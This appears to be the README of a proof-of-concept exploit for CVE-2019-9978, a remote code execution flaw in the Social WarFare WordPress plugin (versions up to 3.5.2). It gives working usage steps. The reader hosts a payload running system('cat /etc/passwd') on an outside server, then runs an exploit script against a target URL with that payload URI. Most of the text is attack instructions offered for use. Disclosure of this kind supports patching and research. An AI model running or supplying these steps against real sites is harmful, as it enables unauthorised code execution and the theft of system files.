CVE-2019-9978 - (PoC) RCE in Social WarFare Plugin (<=3.5.2)
Unauthenticated remote code execution has been discovered in functionality that handles settings import. A user can leverage the use of RFI to RCE.
Copy the following payload:
<pre>system('cat /etc/passwd')</pre>
Save it with filename: payload.txt and upload it on a server. The URI should look like: http(s)://yoursite.com/payload.txt. Finally, supply your --target and --payload-uri options:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt
Researcher: Luka Sikic
Link: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Author: @hash3liZer